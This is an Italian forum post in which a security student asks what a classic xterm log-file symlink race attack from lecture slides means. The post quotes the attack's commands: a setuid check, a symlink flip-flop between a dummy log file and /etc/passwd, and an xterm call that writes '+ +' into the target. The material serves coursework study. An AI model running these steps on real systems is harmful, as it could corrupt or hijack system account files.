ciao a tutti
sto studiando sicurezza per l'università e nelle slide del prof si parla di questo attacco noto al file di log di xterm, ma francamente non lo capisco perché è spiegato malissimo. Sicuramente l'avrà spiegato a lezione, ma io non sono potuto andare alle prime lezioni.
Ecco l'attacco:
ls -lL `which xterm`
# If not setuid/setgid, you are safe
touch dummy
# Think of dummy as xterm’s log file
symlink-flipflop link dummy /etc/passwd
xterm -l -lf link -e echo + +
Credo che i # siano commenti.
Qualcuno ha idea di che si tratti?